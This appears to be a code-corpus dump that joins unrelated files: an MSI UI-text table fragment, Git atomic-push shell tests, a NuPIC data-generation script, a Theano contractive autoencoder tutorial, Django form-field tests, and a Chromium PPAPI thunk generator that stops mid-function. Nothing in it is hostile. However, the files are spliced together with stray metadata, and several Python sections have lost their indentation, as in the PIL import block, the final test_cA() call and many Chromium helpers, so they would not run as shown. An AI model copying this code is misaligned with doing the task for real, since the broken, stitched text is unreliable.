('SelLocalNetwork', 'This feature will be removed from your local hard drive, but will be still available to run from the network'),
('SelNetworkAbsent', "This feature will be uninstalled completely, you won't be able to run it from the network"),
('SelNetworkAdvertise', 'This feature will change from run from network state to set to be installed when required'),
('SelNetworkLocal', 'This feature will change from run from network state to be installed on the local hard drive'),
('SelNetworkNetwork', 'This feature will remain to be run from the network'),
('SelParentCostNegNeg', 'This feature frees up [1] on your hard drive. It has [2] of [3] subfeatures selected. The subfeatures free up [4] on your hard drive.'),
('SelParentCostNegPos', 'This feature frees up [1] on your hard drive. It has [2] of [3] subfeatures selected. The subfeatures require [4] on your hard drive.'),
('SelParentCostPosNeg', 'This feature requires [1] on your hard drive. It has [2] of [3] subfeatures selected. The subfeatures free up [4] on your hard drive.'),
('SelParentCostPosPos', 'This feature requires [1] on your hard drive. It has [2] of [3] subfeatures selected. The subfeatures require [4] on your hard drive.'),
('TimeRemaining', 'Time remaining: {[1] minutes }{[2] seconds}'),
('VolumeCostAvailable', 'Available'),
('VolumeCostDifference', 'Difference'),
('VolumeCostRequired', 'Required'),
('VolumeCostSize', 'Disk Size'),
('VolumeCostVolume', 'Volume'),
]
# Names of the MSI database tables this module defines data for.
tables = ["ActionText", "UIText"]
#!/bin/sh
test_description='pushing to a repository using the atomic push option'
GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=main
export GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME
. ./test-lib.sh
# Create a fresh repository pair: "upstream" is the push destination
# (receive.denyCurrentBranch=warn so pushing to the checked-out branch is
# allowed), and "workbench" is the local repo with a remote "up" that
# points at ../upstream.
mk_repo_pair () {
	rm -rf workbench upstream &&
	test_create_repo upstream &&
	test_create_repo workbench &&
	(
		cd upstream &&
		git config receive.denyCurrentBranch warn
	) &&
	(
		cd workbench &&
		git remote add up ../upstream
	)
}
# Compare the ref ($1) in upstream with a ref value from workbench ($2)
# i.e. test_refs second HEAD@{2}
test_refs () {
	# $1 is resolved inside "upstream", $2 inside "workbench"; the two
	# must name the same commit for the assertion to pass.
	test $# = 2 &&
	git -C upstream rev-parse --verify "$1" >expect &&
	git -C workbench rev-parse --verify "$2" >actual &&
	test_cmp expect actual
}
# Reduce a "git push" status report to the lines that matter for these
# tests: the destination line ("To ...") and the per-ref rejection lines
# (" ! ..."), with space runs squeezed so the output is stable enough to
# compare with test_cmp.
fmt_status_report () {
	sed -n \
		-e "/^To / { s/ */ /g; p; }" \
		-e "/^ ! / { s/ */ /g; p; }"
}
# With nothing to go wrong, --atomic must behave exactly like a plain
# single-branch push: upstream's main ends up at workbench's main.
test_expect_success 'atomic push works for a single branch' '
	mk_repo_pair &&
	(
		cd workbench &&
		test_commit one &&
		git push --mirror up &&
		test_commit two &&
		git push --atomic up main
	) &&
	test_refs main main
'
test_expect_success 'atomic push works for two branches' '
mk_repo_pair &&
(
cd workbench &&
test_commit one &&
git branch second &&
git push --mirror up &&
test_commit two &&
git checkout second &&
test_commit three &&
git push --atomic up main second
) &&
test_refs main main &&
test_refs second second
'
test_expect_success 'atomic push works in combination with --mirror' '
mk_repo_pair &&
(
cd workbench &&
test_commit one &&
git checkout -b second &&
test_commit two &&
git push --atomic --mirror up
) &&
test_refs main main &&
test_refs second second
'
test_expect_success 'atomic push works in combination with --force' '
mk_repo_pair &&
(
cd workbench &&
test_commit one &&
git branch second main &&
test_commit two_a &&
git checkout second &&
test_commit two_b &&
test_commit three_b &&
test_commit four &&
git push --mirror up &&
# The actual test is below
git checkout main &&
test_commit three_a &&
git checkout second &&
git reset --hard HEAD^ &&
git push --force --atomic up main second
) &&
test_refs main main &&
test_refs second second
'
# set up two branches where main can be pushed but second can not
# (non-fast-forward). Since second can not be pushed the whole operation
# will fail and leave main untouched.
test_expect_success 'atomic push fails if one branch fails' '
mk_repo_pair &&
(
cd workbench &&
test_commit one &&
git checkout -b second main &&
test_commit two &&
test_commit three &&
test_commit four &&
git push --mirror up &&
git reset --hard HEAD~2 &&
test_commit five &&
git checkout main &&
test_commit six &&
test_must_fail git push --atomic --all up >output-all 2>&1 &&
# --all and --branches have the same behavior when be combined with --atomic
test_must_fail git push --atomic --branches up >output-branches 2>&1 &&
test_cmp output-all output-branches
) &&
test_refs main HEAD@{7} &&
test_refs second HEAD@{4}
'
test_expect_success 'atomic push fails if one tag fails remotely' '
# prepare the repo
mk_repo_pair &&
(
cd workbench &&
test_commit one &&
git checkout -b second main &&
test_commit two &&
git push --mirror up
) &&
# a third party modifies the server side:
(
cd upstream &&
git checkout second &&
git tag test_tag second
) &&
# see if we can now push both branches.
(
cd workbench &&
git checkout main &&
test_commit three &&
git checkout second &&
test_commit four &&
git tag test_tag &&
test_must_fail git push --tags --atomic up main second
) &&
test_refs main HEAD@{3} &&
test_refs second HEAD@{1}
'
test_expect_success 'atomic push obeys update hook preventing a branch to be pushed' '
mk_repo_pair &&
(
cd workbench &&
test_commit one &&
git checkout -b second main &&
test_commit two &&
git push --mirror up
) &&
test_hook -C upstream update <<-\EOF &&
# only allow update to main from now on
test "$1" = "refs/heads/main"
EOF
(
cd workbench &&
git checkout main &&
test_commit three &&
git checkout second &&
test_commit four &&
test_must_fail git push --atomic up main second
) &&
test_refs main HEAD@{3} &&
test_refs second HEAD@{1}
'
test_expect_success 'atomic push is not advertised if configured' '
mk_repo_pair &&
(
cd upstream &&
git config receive.advertiseatomic 0
) &&
(
cd workbench &&
test_commit one &&
git push --mirror up &&
test_commit two &&
test_must_fail git push --atomic up main
) &&
test_refs main HEAD@{1}
'
# References in upstream : main(1) one(1) foo(1)
# References in workbench: main(2) foo(1) two(2) bar(2)
# Atomic push : main(2) two(2) bar(2)
test_expect_success 'atomic push reports (reject by update hook)' '
mk_repo_pair &&
(
cd workbench &&
test_commit one &&
git branch foo &&
git push up main one foo &&
git tag -d one
) &&
(
mkdir -p upstream/.git/hooks &&
cat >upstream/.git/hooks/update <<-EOF &&
#!/bin/sh
if test "\$1" = "refs/heads/bar"
then
echo >&2 "Pusing to branch bar is prohibited"
exit 1
fi
EOF
chmod a+x upstream/.git/hooks/update
) &&
(
cd workbench &&
test_commit two &&
git branch bar
) &&
test_must_fail git -C workbench \
push --atomic up main two bar >out 2>&1 &&
fmt_status_report <out >actual &&
cat >expect <<-EOF &&
To ../upstream
! [remote rejected] main -> main (atomic push failure)
! [remote rejected] two -> two (atomic push failure)
! [remote rejected] bar -> bar (hook declined)
EOF
test_cmp expect actual
'
# References in upstream : main(1) one(1) foo(1)
# References in workbench: main(2) foo(1) two(2) bar(2)
test_expect_success 'atomic push reports (mirror, but reject by update hook)' '
(
cd workbench &&
git remote remove up &&
git remote add up ../upstream
) &&
test_must_fail git -C workbench \
push --atomic --mirror up >out 2>&1 &&
fmt_status_report <out >actual &&
cat >expect <<-EOF &&
To ../upstream
! [remote rejected] main -> main (atomic push failure)
! [remote rejected] one (atomic push failure)
! [remote rejected] bar -> bar (hook declined)
! [remote rejected] two -> two (atomic push failure)
EOF
test_cmp expect actual
'
# References in upstream : main(2) one(1) foo(1)
# References in workbench: main(1) foo(1) two(2) bar(2)
test_expect_success 'atomic push reports (reject by non-ff)' '
rm upstream/.git/hooks/update &&
(
cd workbench &&
git push up main &&
git reset --hard HEAD^
) &&
test_must_fail git -C workbench \
push --atomic up main foo bar >out 2>&1 &&
fmt_status_report <out >actual &&
cat >expect <<-EOF &&
To ../upstream
! [rejected] main -> main (non-fast-forward)
! [rejected] bar -> bar (atomic push failed)
EOF
test_cmp expect actual
'
test_expect_success 'atomic push reports exit code failure' '
write_script receive-pack-wrapper <<-\EOF &&
git-receive-pack "$@"
exit 1
EOF
test_must_fail git -C workbench push --atomic \
--receive-pack="${SQ}$(pwd)${SQ}/receive-pack-wrapper" \
up HEAD:refs/heads/no-conflict 2>err &&
cat >expect <<-EOF &&
To ../upstream
* [new branch] HEAD -> no-conflict
error: failed to push some refs to ${SQ}../upstream${SQ}
EOF
test_cmp expect err
'
test_expect_success 'atomic push reports exit code failure with porcelain' '
write_script receive-pack-wrapper <<-\EOF &&
git-receive-pack "$@"
exit 1
EOF
test_must_fail git -C workbench push --atomic --porcelain \
--receive-pack="${SQ}$(pwd)${SQ}/receive-pack-wrapper" \
up HEAD:refs/heads/no-conflict-porcelain 2>err &&
cat >expect <<-EOF &&
error: failed to push some refs to ${SQ}../upstream${SQ}
EOF
test_cmp expect err
'
test_done | unknown | github | https://github.com/git/git | t/t5543-atomic-push.sh |
#!/usr/bin/env python
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2015, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
from htmresearch.frameworks.classification.utils.sensor_data import (
generateSensorData, plotSensorData)
from settings import (SIGNAL_TYPES,
NUM_PHASES,
NUM_REPS,
NUM_CATEGORIES,
WHITE_NOISE_AMPLITUDES,
SIGNAL_AMPLITUDES,
SIGNAL_MEANS,
INPUT_DIR,
NOISE_LENGTHS)
def _generateExpData():
  """Generate the sensor-data CSV files for every experiment configuration.

  Iterates over the full cartesian product of the experiment settings
  (signal type, noise amplitude, signal mean/amplitude, category count,
  repetitions, phases, noise length) and writes one CSV per combination
  via generateSensorData.

  The original eight-level nested ``for`` pyramid is flattened with
  ``itertools.product``; the iteration order (last factor varies fastest)
  is identical to the nested loops.

  Returns:
    list of str: paths of the generated CSV files, in generation order.
  """
  import itertools  # local import: keeps this change self-contained

  filePaths = []
  paramGrid = itertools.product(SIGNAL_TYPES,
                                WHITE_NOISE_AMPLITUDES,
                                SIGNAL_MEANS,
                                SIGNAL_AMPLITUDES,
                                NUM_CATEGORIES,
                                NUM_REPS,
                                NUM_PHASES,
                                NOISE_LENGTHS)
  for (signalType, noiseAmplitude, signalMean, signalAmplitude,
       numCategories, numReps, numPhases, noiseLength) in paramGrid:
    # generateSensorData returns (expSetup, numPoints, filePath); only the
    # file path is needed here.
    _, _, filePath = generateSensorData(signalType,
                                        INPUT_DIR,
                                        numPhases,
                                        numReps,
                                        signalMean,
                                        signalAmplitude,
                                        numCategories,
                                        noiseAmplitude,
                                        noiseLength)
    filePaths.append(filePath)
  return filePaths
def main():
  """Generate the experiment CSV files, then plot the sensor data."""
  plotSensorData(_generateExpData(), xlim=[0, 100])


if __name__ == "__main__":
  main()
"""This tutorial introduces Contractive auto-encoders (cA) using Theano.
They are based on auto-encoders as the ones used in Bengio et
al. 2007. An autoencoder takes an input x and first maps it to a
hidden representation y = f_{\theta}(x) = s(Wx+b), parameterized by
\theta={W,b}. The resulting latent representation y is then mapped
back to a "reconstructed" vector z \in [0,1]^d in input space z =
g_{\theta'}(y) = s(W'y + b'). The weight matrix W' can optionally be
constrained such that W' = W^T, in which case the autoencoder is said
to have tied weights. The network is trained such that to minimize
the reconstruction error (the error between x and z). Adding the
squared Frobenius norm of the Jacobian of the hidden mapping h with
respect to the visible units yields the contractive auto-encoder:
- \sum_{k=1}^d[ x_k \log z_k + (1-x_k) \log( 1-z_k)]
+ \| \frac{\partial h(x)}{\partial x} \|^2
References :
- S. Rifai, P. Vincent, X. Muller, X. Glorot, Y. Bengio: Contractive
Auto-Encoders: Explicit Invariance During Feature Extraction, ICML-11
- S. Rifai, X. Muller, X. Glorot, G. Mesnil, Y. Bengio, and Pascal
Vincent. Learning invariant features through local space
contraction. Technical Report 1360, Universite de Montreal
- Y. Bengio, P. Lamblin, D. Popovici, H. Larochelle: Greedy Layer-Wise
Training of Deep Networks, Advances in Neural Information Processing
Systems 19, 2007
"""
import os
import sys
import timeit
import numpy
import theano
import theano.tensor as T
from logistic_sgd import load_data
from utils import tile_raster_images
try:
import PIL.Image as Image
except ImportError:
import Image
class cA(object):
    """ Contractive Auto-Encoder class (cA)

    The contractive autoencoder tries to reconstruct the input with an
    additional constraint on the latent space. With the objective of
    obtaining a robust representation of the input space, we
    regularize the L2 norm(Froebenius) of the jacobian of the hidden
    representation with respect to the input. Please refer to Rifai et
    al., 2011 for more details.

    If x is the input then equation (1) computes the projection of the
    input into the latent space h. Equation (2) computes the jacobian
    of h with respect to x. Equation (3) computes the reconstruction
    of the input, while equation (4) computes the reconstruction
    error and the added regularization term from Eq.(2).

    .. math::

        h_i = s(W_i x + b_i) (1)

        J_i = h_i (1 - h_i) * W_i (2)

        x' = s(W' h + b') (3)

        L = -sum_{k=1}^d [x_k \log x'_k + (1-x_k) \log( 1-x'_k)]
             + lambda * sum_{i=1}^d sum_{j=1}^n J_{ij}^2 (4)
    """

    def __init__(self, numpy_rng, input=None, n_visible=784, n_hidden=100,
                 n_batchsize=1, W=None, bhid=None, bvis=None):
        """Initialize the cA class by specifying the number of visible units
        (the dimension d of the input), the number of hidden units (the
        dimension d' of the latent or hidden space) and the contraction level.
        The constructor also receives symbolic variables for the input, weights
        and bias.

        :type numpy_rng: numpy.random.RandomState
        :param numpy_rng: number random generator used to generate weights

        :type input: theano.tensor.TensorType
        :param input: a symbolic description of the input or None for
                      standalone cA

        :type n_visible: int
        :param n_visible: number of visible units

        :type n_hidden: int
        :param n_hidden: number of hidden units

        :type n_batchsize: int
        :param n_batchsize: number of examples per batch

        :type W: theano.tensor.TensorType
        :param W: Theano variable pointing to a set of weights that should be
                  shared between the dA and another architecture; if dA should
                  be standalone set this to None

        :type bhid: theano.tensor.TensorType
        :param bhid: Theano variable pointing to a set of biases values (for
                     hidden units) that should be shared between dA and
                     another architecture; if dA should be standalone set this
                     to None

        :type bvis: theano.tensor.TensorType
        :param bvis: Theano variable pointing to a set of biases values (for
                     visible units) that should be shared between dA and
                     another architecture; if dA should be standalone set this
                     to None
        """
        self.n_visible = n_visible
        self.n_hidden = n_hidden
        self.n_batchsize = n_batchsize
        # note : W' was written as `W_prime` and b' as `b_prime`
        if not W:
            # W is initialized with `initial_W`, uniformly sampled from
            # -4*sqrt(6./(n_visible+n_hidden)) to
            # 4*sqrt(6./(n_hidden+n_visible)); the output of `uniform` is
            # converted using asarray to dtype theano.config.floatX so that
            # the code is runnable on GPU.
            initial_W = numpy.asarray(
                numpy_rng.uniform(
                    low=-4 * numpy.sqrt(6. / (n_hidden + n_visible)),
                    high=4 * numpy.sqrt(6. / (n_hidden + n_visible)),
                    size=(n_visible, n_hidden)
                ),
                dtype=theano.config.floatX
            )
            W = theano.shared(value=initial_W, name='W', borrow=True)

        if not bvis:
            bvis = theano.shared(value=numpy.zeros(n_visible,
                                                   dtype=theano.config.floatX),
                                 borrow=True)

        if not bhid:
            bhid = theano.shared(value=numpy.zeros(n_hidden,
                                                   dtype=theano.config.floatX),
                                 name='b',
                                 borrow=True)

        self.W = W
        # b corresponds to the bias of the hidden
        self.b = bhid
        # b_prime corresponds to the bias of the visible
        self.b_prime = bvis
        # tied weights, therefore W_prime is W transpose
        self.W_prime = self.W.T

        # if no input is given, generate a variable representing the input
        if input is None:
            # we use a matrix because we expect a minibatch of several
            # examples, each example being a row
            self.x = T.dmatrix(name='input')
        else:
            self.x = input

        self.params = [self.W, self.b, self.b_prime]

    def get_hidden_values(self, input):
        """ Computes the values of the hidden layer """
        return T.nnet.sigmoid(T.dot(input, self.W) + self.b)

    def get_jacobian(self, hidden, W):
        """Computes the jacobian of the hidden layer with respect to
        the input, reshapes are necessary for broadcasting the
        element-wise product on the right axis
        """
        # (batch, 1, n_hidden) * (1, n_visible, n_hidden) broadcasts to a
        # (batch, n_visible, n_hidden) tensor of per-example Jacobians.
        return T.reshape(hidden * (1 - hidden),
                         (self.n_batchsize, 1, self.n_hidden)) * T.reshape(
                             W, (1, self.n_visible, self.n_hidden))

    def get_reconstructed_input(self, hidden):
        """Computes the reconstructed input given the values of the
        hidden layer
        """
        return T.nnet.sigmoid(T.dot(hidden, self.W_prime) + self.b_prime)

    def get_cost_updates(self, contraction_level, learning_rate):
        """ This function computes the cost and the updates for one training
        step of the cA """
        y = self.get_hidden_values(self.x)
        z = self.get_reconstructed_input(y)
        J = self.get_jacobian(y, self.W)
        # note : we sum over the size of a datapoint; if we are using
        #        minibatches, L will be a vector, with one entry per
        #        example in minibatch
        self.L_rec = - T.sum(self.x * T.log(z) +
                             (1 - self.x) * T.log(1 - z),
                             axis=1)
        # Compute the jacobian and average over the number of samples/minibatch
        self.L_jacob = T.sum(J ** 2) / self.n_batchsize
        # note : L is now a vector, where each element is the
        #        cross-entropy cost of the reconstruction of the
        #        corresponding example of the minibatch. We need to
        #        compute the average of all these to get the cost of
        #        the minibatch
        cost = T.mean(self.L_rec) + contraction_level * T.mean(self.L_jacob)

        # compute the gradients of the cost of the `cA` with respect
        # to its parameters
        gparams = T.grad(cost, self.params)
        # generate the list of updates
        updates = []
        for param, gparam in zip(self.params, gparams):
            updates.append((param, param - learning_rate * gparam))

        return (cost, updates)
def test_cA(learning_rate=0.01, training_epochs=20,
            dataset='mnist.pkl.gz',
            batch_size=10, output_folder='cA_plots', contraction_level=.1):
    """
    This demo is tested on MNIST

    :type learning_rate: float
    :param learning_rate: learning rate used for training the contracting
                          AutoEncoder

    :type training_epochs: int
    :param training_epochs: number of epochs used for training

    :type dataset: string
    :param dataset: path to the picked dataset
    """
    datasets = load_data(dataset)
    train_set_x, train_set_y = datasets[0]

    # compute number of minibatches for training, validation and testing
    # NOTE(review): integer division under Python 2 (this file uses the
    # Python 2 print statement and xrange throughout).
    n_train_batches = train_set_x.get_value(borrow=True).shape[0] / batch_size

    # allocate symbolic variables for the data
    index = T.lscalar()    # index to a [mini]batch
    x = T.matrix('x')  # the data is presented as rasterized images

    if not os.path.isdir(output_folder):
        os.makedirs(output_folder)
    # All outputs (the filter plot below) are written inside output_folder.
    os.chdir(output_folder)

    ####################################
    #     BUILDING THE MODEL           #
    ####################################

    rng = numpy.random.RandomState(123)

    ca = cA(numpy_rng=rng, input=x,
            n_visible=28 * 28, n_hidden=500, n_batchsize=batch_size)

    cost, updates = ca.get_cost_updates(contraction_level=contraction_level,
                                        learning_rate=learning_rate)

    # Compiled Theano function: one gradient step on minibatch `index`,
    # returning the mean reconstruction cost and the Jacobian penalty.
    train_ca = theano.function(
        [index],
        [T.mean(ca.L_rec), ca.L_jacob],
        updates=updates,
        givens={
            x: train_set_x[index * batch_size: (index + 1) * batch_size]
        }
    )

    start_time = timeit.default_timer()

    ############
    # TRAINING #
    ############

    # go through training epochs
    for epoch in xrange(training_epochs):
        # go through training set
        c = []
        for batch_index in xrange(n_train_batches):
            c.append(train_ca(batch_index))

        c_array = numpy.vstack(c)
        print 'Training epoch %d, reconstruction cost ' % epoch, numpy.mean(
            c_array[0]), ' jacobian norm ', numpy.mean(numpy.sqrt(c_array[1]))

    end_time = timeit.default_timer()

    training_time = (end_time - start_time)

    print >> sys.stderr, ('The code for file ' + os.path.split(__file__)[1] +
                          ' ran for %.2fm' % ((training_time) / 60.))

    # Save a tiling of the learned filters (rows of W^T) as a PNG.
    image = Image.fromarray(tile_raster_images(
        X=ca.W.get_value(borrow=True).T,
        img_shape=(28, 28), tile_shape=(10, 10),
        tile_spacing=(1, 1)))

    image.save('cae_filters.png')

    os.chdir('../')
if __name__ == '__main__':
test_cA() | unknown | codeparrot/codeparrot-clean | ||
from __future__ import unicode_literals
from django.forms import Form, HiddenInput, NullBooleanField, RadioSelect
from django.test import SimpleTestCase
from . import FormFieldAssertionsMixin
class NullBooleanFieldTest(FormFieldAssertionsMixin, SimpleTestCase):
    """Tests for forms.NullBooleanField: cleaning of three-state input,
    HiddenInput round-tripping, RadioSelect choices, and has_changed()."""

    def test_nullbooleanfield_clean(self):
        # clean() maps true-ish strings/values to True, false-ish to False,
        # and anything unrecognized (including '') to None.
        f = NullBooleanField()
        self.assertIsNone(f.clean(''))
        self.assertTrue(f.clean(True))
        self.assertFalse(f.clean(False))
        self.assertIsNone(f.clean(None))
        self.assertFalse(f.clean('0'))
        self.assertTrue(f.clean('1'))
        self.assertIsNone(f.clean('2'))
        self.assertIsNone(f.clean('3'))
        self.assertIsNone(f.clean('hello'))
        self.assertTrue(f.clean('true'))
        self.assertFalse(f.clean('false'))

    def test_nullbooleanfield_2(self):
        # The internal value is preserved if using HiddenInput (#7753).
        class HiddenNullBooleanForm(Form):
            hidden_nullbool1 = NullBooleanField(widget=HiddenInput, initial=True)
            hidden_nullbool2 = NullBooleanField(widget=HiddenInput, initial=False)
        f = HiddenNullBooleanForm()
        self.assertHTMLEqual(
            '<input type="hidden" name="hidden_nullbool1" value="True" id="id_hidden_nullbool1" />'
            '<input type="hidden" name="hidden_nullbool2" value="False" id="id_hidden_nullbool2" />',
            str(f)
        )

    def test_nullbooleanfield_3(self):
        # The 'True'/'False' strings produced by HiddenInput round-trip back
        # to real booleans through full_clean().
        class HiddenNullBooleanForm(Form):
            hidden_nullbool1 = NullBooleanField(widget=HiddenInput, initial=True)
            hidden_nullbool2 = NullBooleanField(widget=HiddenInput, initial=False)
        f = HiddenNullBooleanForm({'hidden_nullbool1': 'True', 'hidden_nullbool2': 'False'})
        self.assertIsNone(f.full_clean())
        self.assertTrue(f.cleaned_data['hidden_nullbool1'])
        self.assertFalse(f.cleaned_data['hidden_nullbool2'])

    def test_nullbooleanfield_4(self):
        # Make sure we're compatible with MySQL, which uses 0 and 1 for its
        # boolean values (#9609).
        NULLBOOL_CHOICES = (('1', 'Yes'), ('0', 'No'), ('', 'Unknown'))

        class MySQLNullBooleanForm(Form):
            nullbool0 = NullBooleanField(widget=RadioSelect(choices=NULLBOOL_CHOICES))
            nullbool1 = NullBooleanField(widget=RadioSelect(choices=NULLBOOL_CHOICES))
            nullbool2 = NullBooleanField(widget=RadioSelect(choices=NULLBOOL_CHOICES))
        f = MySQLNullBooleanForm({'nullbool0': '1', 'nullbool1': '0', 'nullbool2': ''})
        self.assertIsNone(f.full_clean())
        self.assertTrue(f.cleaned_data['nullbool0'])
        self.assertFalse(f.cleaned_data['nullbool1'])
        self.assertIsNone(f.cleaned_data['nullbool2'])

    def test_nullbooleanfield_changed(self):
        f = NullBooleanField()
        self.assertTrue(f.has_changed(False, None))
        self.assertTrue(f.has_changed(None, False))
        self.assertFalse(f.has_changed(None, None))
        self.assertFalse(f.has_changed(False, False))
        self.assertTrue(f.has_changed(True, False))
        self.assertTrue(f.has_changed(True, None))
        self.assertTrue(f.has_changed(True, False))
        # HiddenInput widget sends string values for boolean but doesn't clean them in value_from_datadict
        self.assertFalse(f.has_changed(False, 'False'))
        self.assertFalse(f.has_changed(True, 'True'))
        self.assertFalse(f.has_changed(None, ''))
        self.assertTrue(f.has_changed(False, 'True'))
        self.assertTrue(f.has_changed(True, 'False'))
        self.assertTrue(f.has_changed(None, 'False'))
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
""" Generator for C++ style thunks """
import glob
import os
import re
import sys
from idl_log import ErrOut, InfoOut, WarnOut
from idl_node import IDLAttribute, IDLNode
from idl_ast import IDLAst
from idl_option import GetOption, Option, ParseOptions
from idl_outfile import IDLOutFile
from idl_parser import ParseFiles
from idl_c_proto import CGen, GetNodeComments, CommentLines, Comment
from idl_generator import Generator, GeneratorByFile
Option('thunkroot', 'Base directory of output',
default=os.path.join('..', 'thunk'))
class TGenError(Exception):
  """Error raised while generating thunk code.

  The message is kept in |value| for backward compatibility with callers
  that read it directly.
  """

  def __init__(self, msg):
    # Also initialize the Exception base class so `args`, default string
    # formatting and pickling behave normally (the original skipped this).
    super(TGenError, self).__init__(msg)
    self.value = msg

  def __str__(self):
    return repr(self.value)
class ThunkBodyMetadata(object):
  """Metadata about thunk body. Used for selecting which headers to emit.

  Holds three independent sets of header names, filled in while member
  bodies are generated and consumed when the file head is written.
  """

  def __init__(self):
    self._api_headers = set()
    self._system_headers = set()
    self._extra_headers = set()

  def AddApi(self, api):
    self._api_headers.add(api)

  def AddInclude(self, include):
    self._extra_headers.add(include)

  def AddBuiltinInclude(self, include):
    self._system_headers.add(include)

  def Apis(self):
    return self._api_headers

  def Includes(self):
    return self._extra_headers

  def BuiltinIncludes(self):
    return self._system_headers
def _GetBaseFileName(filenode):
"""Returns the base name for output files, given the filenode.
Examples:
'dev/ppb_find_dev.h' -> 'ppb_find_dev'
'trusted/ppb_buffer_trusted.h' -> 'ppb_buffer_trusted'
"""
path, name = os.path.split(filenode.GetProperty('NAME'))
name = os.path.splitext(name)[0]
return name
def _GetHeaderFileName(filenode):
"""Returns the name for the header for this file."""
path, name = os.path.split(filenode.GetProperty('NAME'))
name = os.path.splitext(name)[0]
if path:
header = "ppapi/c/%s/%s.h" % (path, name)
else:
header = "ppapi/c/%s.h" % name
return header
def _GetThunkFileName(filenode, relpath):
"""Returns the thunk file name."""
path = os.path.split(filenode.GetProperty('NAME'))[0]
name = _GetBaseFileName(filenode)
# We don't reattach the path for thunk.
if relpath: name = os.path.join(relpath, name)
name = '%s%s' % (name, '_thunk.cc')
return name
def _StripFileName(filenode):
"""Strips path and dev, trusted, and private suffixes from the file name."""
api_basename = _GetBaseFileName(filenode)
if api_basename.endswith('_dev'):
api_basename = api_basename[:-len('_dev')]
if api_basename.endswith('_trusted'):
api_basename = api_basename[:-len('_trusted')]
if api_basename.endswith('_private'):
api_basename = api_basename[:-len('_private')]
return api_basename
def _StripApiName(api_name):
"""Strips Dev, Private, and Trusted suffixes from the API name."""
if api_name.endswith('Trusted'):
api_name = api_name[:-len('Trusted')]
if api_name.endswith('_Dev'):
api_name = api_name[:-len('_Dev')]
if api_name.endswith('_Private'):
api_name = api_name[:-len('_Private')]
return api_name
def _MakeEnterLine(filenode, interface, member, arg, handle_errors, callback,
                   meta):
  """Returns an EnterInstance/EnterResource string for a function.

  Args:
    filenode: IDLNode for the file; used to derive the *_api.h header name.
    interface: IDLNode for the interface being generated.
    member: IDLNode for the member function.
    arg: 4-tuple for the first argument; arg[0] is the C type name and
        arg[1] the parameter name. Must be PP_Instance or PP_Resource.
    handle_errors: bool forwarded (lower-cased) to the EnterResource ctor.
    callback: C expression for the completion callback, or None.
    meta: ThunkBodyMetadata; required API headers are recorded here.

  Raises:
    TGenError: if arg[0] is neither PP_Instance nor PP_Resource.
  """
  api_name = _StripApiName(interface.GetName()) + '_API'
  if member.GetProperty('api'):  # Override API name.
    manually_provided_api = True
    # TODO(teravest): Automatically guess the API header file.
    api_name = member.GetProperty('api')
  else:
    manually_provided_api = False

  if arg[0] == 'PP_Instance':
    if callback is None:
      arg_string = arg[1]
    else:
      arg_string = '%s, %s' % (arg[1], callback)
    if interface.GetProperty('singleton') or member.GetProperty('singleton'):
      # Singleton interfaces go through EnterInstanceAPI; the API header is
      # only needed when the API name wasn't manually overridden.
      if not manually_provided_api:
        meta.AddApi('ppapi/thunk/%s_api.h' % _StripFileName(filenode))
      return 'EnterInstanceAPI<%s> enter(%s);' % (api_name, arg_string)
    else:
      return 'EnterInstance enter(%s);' % arg_string
  elif arg[0] == 'PP_Resource':
    enter_type = 'EnterResource<%s>' % api_name
    if not manually_provided_api:
      meta.AddApi('ppapi/thunk/%s_api.h' % _StripFileName(filenode))
    if callback is None:
      return '%s enter(%s, %s);' % (enter_type, arg[1],
                                    str(handle_errors).lower())
    else:
      return '%s enter(%s, %s, %s);' % (enter_type, arg[1],
                                        callback,
                                        str(handle_errors).lower())
  else:
    raise TGenError("Unknown type for _MakeEnterLine: %s" % arg[0])
def _GetShortName(interface, filter_suffixes):
"""Return a shorter interface name that matches Is* and Create* functions."""
parts = interface.GetName().split('_')[1:]
tail = parts[len(parts) - 1]
if tail in filter_suffixes:
parts = parts[:-1]
return ''.join(parts)
def _IsTypeCheck(interface, node, args):
"""Returns true if node represents a type-checking function."""
if len(args) == 0 or args[0][0] != 'PP_Resource':
return False
return node.GetName() == 'Is%s' % _GetShortName(interface, ['Dev', 'Private'])
def _GetCreateFuncName(interface):
"""Returns the creation function name for an interface."""
return 'Create%s' % _GetShortName(interface, ['Dev'])
def _GetDefaultFailureValue(t):
"""Returns the default failure value for a given type.
Returns None if no default failure value exists for the type.
"""
values = {
'PP_Bool': 'PP_FALSE',
'PP_Resource': '0',
'struct PP_Var': 'PP_MakeUndefined()',
'float': '0.0f',
'int32_t': 'enter.retval()',
'uint16_t': '0',
'uint32_t': '0',
'uint64_t': '0',
'void*': 'NULL'
}
if t in values:
return values[t]
return None
def _MakeCreateMemberBody(interface, member, args):
  """Returns the body of a Create() function.

  Args:
    interface - IDLNode for the interface
    member - IDLNode for member function
    args - List of arguments for the Create() function

  Raises:
    TGenError: if the first argument is neither PP_Resource nor PP_Instance.
  """
  if args[0][0] == 'PP_Resource':
    # Look the resource up first so the creation context can be taken from
    # the instance that owns it.
    body = 'Resource* object =\n'
    body += ' PpapiGlobals::Get()->GetResourceTracker()->'
    body += 'GetResource(%s);\n' % args[0][1]
    body += 'if (!object)\n'
    body += ' return 0;\n'
    body += 'EnterResourceCreation enter(object->pp_instance());\n'
  elif args[0][0] == 'PP_Instance':
    body = 'EnterResourceCreation enter(%s);\n' % args[0][1]
  else:
    raise TGenError('Unknown arg type for Create(): %s' % args[0][0])

  body += 'if (enter.failed())\n'
  body += ' return 0;\n'
  arg_list = ', '.join([a[1] for a in args])
  # An IDL attribute may override the conventional Create<Short> name.
  if member.GetProperty('create_func'):
    create_func = member.GetProperty('create_func')
  else:
    create_func = _GetCreateFuncName(interface)
